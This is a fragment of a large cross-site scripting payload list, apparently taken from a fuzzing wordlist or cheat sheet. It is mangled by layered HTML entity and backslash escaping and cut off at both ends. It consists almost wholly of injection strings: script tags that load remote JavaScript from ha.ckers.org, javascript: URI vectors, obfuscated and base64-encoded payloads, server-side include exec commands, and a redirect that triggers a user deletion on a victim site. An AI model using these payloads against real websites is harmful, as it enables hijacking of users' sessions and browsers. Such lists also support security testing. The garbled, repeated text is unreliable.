SRC=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;EMBED SRC=\\\&quot;PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\&quot; type=\\\&quot;image/svg+xml\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;&lt;/EMBED&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; \\\&#039;\\\&#039; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;\\r\\n&lt;SCRIPT \\\&quot;a=\\\&#039;&gt;\\\&#039;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&#039;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;\\r\\n(\\\&quot;&lt;SCRI\\\&quot;);PT SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;\\r\\n&lt;alert&#40;\\\&quot;XSS\\\&quot;&#41;;//&lt;\\r\\n&lt;\\\&quot;\\\&#039;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\&#039;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\&quot;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\&quot;;alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\&quot;&gt;\\\&#039;&gt;alert&#40;String.fromCharCode(88,83,83&#41;)\\r\\n\\\&#039;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\&#039;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\&quot;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\&quot;;alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\&quot;&gt;\\\&#039;&gt;alert&#40;String.fromCharCode(88,83,83&#41;)&lt;?/SCRIPT&gt;&amp;submit.x=27&amp;submit.y=9&amp;cmd=search\\r\\nalert&#40;\\\&quot;hellox worldss\\\&quot;&#41;&amp;safe=high&amp;cx=006665157904466893121:su_tzknyxug&amp;cof=FORID:9#510\\r\\nalert&#40;\\\&quot;XSS\\\&quot;&#41;;&amp;search=1\\r\\n0&amp;q=\\\&#039;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\&#039;;alert%2?8String.fromCharCode(88,83,83))//\\\&quot;;alert&#40;String.fromCharCode?(88,83,83&#41;)//\\\\\\\&quot;;alert&#40;String.fromCharCode(88,83,83&#41;%?29//--&gt;\\\&quot;&gt;\\\&#039;&gt;alert&#40;String.fromCharCode(88,83%?2C83&#41;)&amp;submit-frmGoogleWeb=Web+Search\\r\\n&lt;h1&gt;&lt;font color=blue&gt;hellox worldss&lt;/h1&gt;\\r\\n&lt;BODY =alert&#40;\\\&#039;hellox worldss\\\&#039;&#41;&gt;\\r\\n&lt;input =write(XSS) autofocus&gt;\\r\\n&lt;input =write(XSS) autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;body =alert&#40;XSS&#41;&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form&gt;&lt;button formaction=\\\&quot;(XSS)\\\&quot;&gt;lol\\r\\n&lt;!--&lt;img src=\\\&quot;--&gt;&lt;img src=x =alert&#40;XSS&#41;//\\\&quot;&gt;\\r\\n&lt;![&gt;&lt;img src=\\\&quot;]&gt;&lt;img src=x =alert&#40;XSS&#41;//\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;img src=\\\&quot;&lt;/style&gt;&lt;img src=x =alert&#40;XSS&#41;//\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;alert&#40;1&#41;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;&gt;alert&#40;1&#41;\\\&quot;&gt;\\r\\n&lt;/ foo=\\\&quot;&gt;alert&#40;1&#41;\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;x foo=\\\&#039;?&gt;alert&#40;1&#41;\\\&#039;&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;[[[Inception]]\\\&quot;&gt;&lt;x foo=\\\&quot;]foo&gt;alert&#40;1&#41;\\\&quot;&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\&quot;%&gt;alert&#40;123&#41;\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;font-family:\\\&#039;foo&amp;#10;;color:red;\\\&#039;;\\\&quot;&gt;LOL\\r\\nLOL&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;\\r\\n({0:#0=alert/#0#/#0#(0)})\\r\\n&lt;svg xmlns=\\\&quot;http://www.w3.org/2000/svg\\\&quot;&gt;LOLalert&#40;123&#41;&lt;/svg&gt;\\r\\n&amp;lt;SCRIPT&amp;gt;alert&#40;/XSS/&amp;#46;source&#41;&amp;lt;/SCRIPT&amp;gt;\\r\\n\\\\\\\\\\\&quot;;alert&#40;\\\&#039;XSS\\\&#039;&#41;;//\\r\\n&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert&#40;\\\\\\\&quot;XSS\\\\\\\&quot;&#41;;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;INPUT TYPE=\\\\\\\&quot;IMAGE\\\\\\\&quot; SRC=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BODY BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BODY =alert&#40;\\\&#039;XSS\\\&#039;&#41;&amp;gt;\\r\\n&amp;lt;IMG DYNSRC=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG LOWSRC=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BGSOUND SRC=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BR SIZE=\\\\\\\&quot;&amp;{alert&#40;\\\&#039;XSS\\\&#039;&#41;}\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;LAYER SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\\\\\\\&quot;&amp;gt;&amp;lt;/LAYER&amp;gt;\\r\\n&amp;lt;LINK REL=\\\\\\\&quot;stylesheet\\\\\\\&quot; HREF=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;LINK REL=\\\\\\\&quot;stylesheet\\\\\\\&quot; HREF=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@import\\\&#039;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\\\&#039;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;Link\\\\\\\&quot; Content=\\\\\\\&quot;&amp;lt;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css&amp;gt;; REL=stylesheet\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;BODY{&amp;#58;url(\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xssmoz&amp;#46;xml#xss\\\\\\\&quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;XSS STYLE=\\\\\\\&quot;behavior&amp;#58; url(xss&amp;#46;htc);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;li {list-style-image&amp;#58; url(\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS\\r\\n&amp;lt;IMG SRC=\\\&#039;vbscript&amp;#058;msgbox(\\\\\\\&quot;XSS\\\\\\\&quot;)\\\&#039;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;mocha&amp;#58;&amp;#91;code&amp;#93;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;livescript&amp;#058;&amp;#91;code&amp;#93;\\\\\\\&quot;&amp;gt;\\r\\nscriptualert&#40;EXSSE&#41;/scriptu\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0;url=javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0;url=data&amp;#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0; URL=http&amp;#58;//;URL=javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\&quot;\\r\\n&amp;lt;IFRAME SRC=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\&quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;\\r\\n&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\&quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;\\r\\n&amp;lt;TABLE BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58; url(javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58;\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028&amp;#46;1027\\\\0058&amp;#46;1053\\\\0053\\\\0027\\\\0029\\\&#039;\\\\0029\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58; url(javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;width&amp;#58; alert&#40;\\\&#039;XSS\\\&#039;&#41;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript&amp;#58;alert&#40;\\\\\\\&quot;XSS\\\\\\\&quot;&#41;\\\&#039;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;IMG STYLE=\\\\\\\&quot;xss&amp;#58;expr/*XSS*/ession(alert&#40;\\\&#039;XSS\\\&#039;&#41;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;XSS STYLE=\\\\\\\&quot;xss&amp;#58;alert&#40;\\\&#039;XSS\\\&#039;&#41;)\\\\\\\&quot;&amp;gt;\\r\\nexp/*&amp;lt;A STYLE=\\\&#039;no\\\\xss&amp;#58;noxss(\\\\\\\&quot;*//*\\\\\\\&quot;);\\r\\nxss&amp;#58;ex&amp;#x2F;*XSS*//*/*/pression(alert&#40;\\\\\\\&quot;XSS\\\\\\\&quot;&#41;)\\\&#039;&amp;gt;\\r\\n&amp;lt;STYLE TYPE=\\\\\\\&quot;text/javascript\\\\\\\&quot;&amp;gt;alert&#40;\\\&#039;XSS\\\&#039;&#41;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;&amp;#46;XSS{background-image&amp;#58;url(\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;\\r\\n&amp;lt;STYLE type=\\\\\\\&quot;text/css\\\\\\\&quot;&amp;gt;BODY{background&amp;#58;url(\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;!--&amp;#91;if gte IE 4&amp;#93;&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;alert&#40;\\\&#039;XSS\\\&#039;&#41;;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;!&amp;#91;endif&amp;#93;--&amp;gt;\\r\\n&amp;lt;BASE HREF=\\\\\\\&quot;javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;;//\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;OBJECT TYPE=\\\\\\\&quot;text/x-scriptlet\\\\\\\&quot; DATA=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\\\\\\\&quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;OBJECT classid=clsid&amp;#58;ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript&amp;#058;alert&#40;\\\&#039;XSS\\\&#039;&#41;&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;EMBED SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;swf\\\\\\\&quot; AllowScriptAccess=\\\\\\\&quot;always\\\\\\\&quot;&amp;gt;&amp;lt;/EMBED&amp;gt;\\r\\n&amp;lt;EMBED SRC=\\\\\\\&quot;data&amp;#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\\\\\&quot; type=\\\\\\\&quot;image/svg+xml\\\\\\\&quot; AllowScriptAccess=\\\\\\\&quot;always\\\\\\\&quot;&amp;gt;&amp;lt;/EMBED&amp;gt;\\r\\na=\\\\\\\&quot;get\\\\\\\&quot;;\\r\\nb=\\\\\\\&quot;URL(\\\\\\\\\\\&quot;\\\\\\\&quot;;\\r\\nc=\\\\\\\&quot;javascript&amp;#058;\\\\\\\&quot;;\\r\\nd=\\\\\\\&quot;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\\\\\&quot;)\\\\\\\&quot;;\\r\\neval&#40;a+b+c+d&#41;;\\r\\n&amp;lt;HTML xmlns&amp;#58;xss&amp;gt;&amp;lt;?import namespace=\\\\\\\&quot;xss\\\\\\\&quot; implementation=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;htc\\\\\\\&quot;&amp;gt;&amp;lt;xss&amp;#58;xss&amp;gt;XSS&amp;lt;/xss&amp;#58;xss&amp;gt;&amp;lt;/HTML&amp;gt;\\r\\n&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;&amp;lt;IMG SRC=\\\\\\\&quot;javas&amp;#93;&amp;#93;&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;cript&amp;#58;alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\\\\\&quot;&amp;gt;&amp;#93;&amp;#93;&amp;gt;\\r\\n&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;XML ID=\\\\\\\&quot;xss\\\\\\\&quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=\\\\\\\&quot;javas&amp;lt;!-- --&amp;gt;cript&amp;#58;alert&#40;\\\&#039;XSS\\\&#039;&#41;\\\\\\\&quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;SPAN DATASRC=\\\\\\\&quot;#xss\\\\\\\&quot; DATAFLD=\\\\\\\&quot;B\\\\\\\&quot; DATAFORMATAS=\\\\\\\&quot;HTML\\\\\\\&quot;&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;XML SRC=\\\\\\\&quot;xsstest&amp;#46;xml\\\\\\\&quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;\\r\\n&amp;lt;?xml&amp;#58;namespace prefix=\\\\\\\&quot;t\\\\\\\&quot; ns=\\\\\\\&quot;urn&amp;#58;schemas-microsoft-com&amp;#58;time\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;?import namespace=\\\\\\\&quot;t\\\\\\\&quot; implementation=\\\\\\\&quot;#default#time2\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;t&amp;#58;set attributeName=\\\\\\\&quot;innerHTML\\\\\\\&quot; to=\\\\\\\&quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;alert&#40;&amp;quot;XSS&amp;quot;&#41;&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;jpg\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;!--#exec cmd=\\\\\\\&quot;/bin/echo \\\&#039;&amp;lt;SCR\\\&#039;\\\\\\\&quot;--&amp;gt;&amp;lt;!--#exec cmd=\\\\\\\&quot;/bin/echo \\\&#039;IPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\\&#039;\\\\\\\&quot;--&amp;gt;\\r\\n&amp;lt;? echo(\\\&#039;&amp;lt;SCR)\\\&#039;;\\r\\necho(\\\&#039;IPT&amp;gt;alert&#40;\\\\\\\&quot;XSS\\\\\\\&quot;&#41;&amp;lt;/SCRIPT&amp;gt;\\\&#039;); ?&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;http&amp;#58;//www&amp;#46;thesiteyouareon&amp;#46;com/somecommand&amp;#46;php?somevariables=maliciouscode\\\\\\\&quot;&amp;gt;\\r\\nRedirect 302 /a&amp;#46;jpg http&amp;#58;//victimsite&amp;#46;com/admin&amp;#46;asp&amp;deleteuser\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;Set-Cookie\\\\\\\&quot; Content=\\\\\\\&quot;USERID=&amp;lt;SCRIPT&amp;gt;alert&#40;\\\&#039;XSS\\\&#039;&#41;&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;CONTENT-TYPE\\\\\\\&quot; CONTENT=\\\\\\\&quot;text/html; charset=UTF-7\\\\\\\&quot;&amp;gt; &amp;lt;/HEAD&amp;gt;\\r\\n\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n\\r\\n\\\\\\\" \\\'\\\' SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n\\\'\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n` SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n\\\'>\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\nPT SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n&lt;\\r\\n&lt;\\r\\n&lt\\r\\n&lt;\\r\\n&LT\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&#X3c\\r\\n&#X03c\\r\\n&#X003c\\r\\n&#X0003c\\r\\n&#X00003c\\r\\n&#X000003c\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&#X3C\\r\\n&#X03C\\r\\n&#X003C\\r\\n&#X0003C\\r\\n&#X00003C\\r\\n&#X000003C\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n\\\\x3c\\r\\n\\\\x3C\\r\\n\\\&lt;\\r\\n\\\&lt;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html&gt;\\r\\n&lt;IMG &gt;\\&gt;\\r\\n\\r\\n&lt;IMG &gt;\\r\\nperl -e \\\'print \\\\\\\"&lt;SCR\\\\0IPT&gt;alert&#40;\\\\\\\\\\\"XSS\\\\\\\\\\\"&#41;&lt;/SCR\\\\0IPT&gt;\\\\\\\";\\\' &gt; out\\r\\nperl -e \\\'print \\\\\\\"&lt;IMG &gt;\\\\\\\";\\\' &gt; out\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG \\\\\\\"\\\\\\\"\\\\\\\"&gt;\\\\\\\"&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n\\r\\n\\\'\\\';!--\\\\\\\"&lt;XSS&gt;=&{()}\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\\\\\"&gt;\\\'&gt;\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=javascrscriptipt:alert&#40;\\\'XSS\\\'&#41;&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;alert&#40;\\\"XSS\\\"&#41;\\\"&gt;\\r\\n&lt;IMG SRC=\\\" &#14; (\\\'XSS\\\');\\\"&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT/SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;alert&#40;\\\"XSS\\\"&#41;;//&lt;\\r\\na=/XSS/alert&#40;a.source&#41;\\r\\n\\\\\\\";alert&#40;\\\'XSS\\\'&#41;;//\\r\\n&lt;/TITLE&gt;alert&#40;\\\"XSS\\\"&#41;;\\r\\nscriptalert&#40;XSS&#41;/script\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;DIV STYLE=\\\"background-image: url((\\\'XSS\\\'))\\\"&gt;\\r\\n&lt;DIV STYLE=\\\"background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\"&gt;\\r\\n&lt;DIV STYLE=\\\"width: alert&#40;\\\'XSS\\\'&#41;);\\\"&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\"XSS\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\"xss:expr/*XSS*/ession(alert&#40;\\\'XSS\\\'&#41;)\\\"&gt;\\r\\n&lt;XSS STYLE=\\\"xss:alert&#40;\\\'XSS\\\'&#41;)\\\"&gt;\\r\\nexp/*&lt;A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(alert&#40;\\\"XSS\\\"&#41;)\\\'&gt;\\r\\n&lt;EMBED SRC=\\\"http://ha.ckers.org/xss.swf\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\\r\\na=\\\"get\\\";b=\\\"URL(ja\\\\\\\"\\\";c=\\\"vascr\\\";d=\\\"ipt:ale\\\";e=\\\"rt(\\\'XSS\\\');\\\\\\\")\\\";eval&#40;a+b+c+d+e&#41;;\\r\\n&lt;SCRIPT SRC=\\\"http://ha.ckers.org/xss.jpg\\\"&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"&gt;&lt;?import namespace=\\\"t\\\" 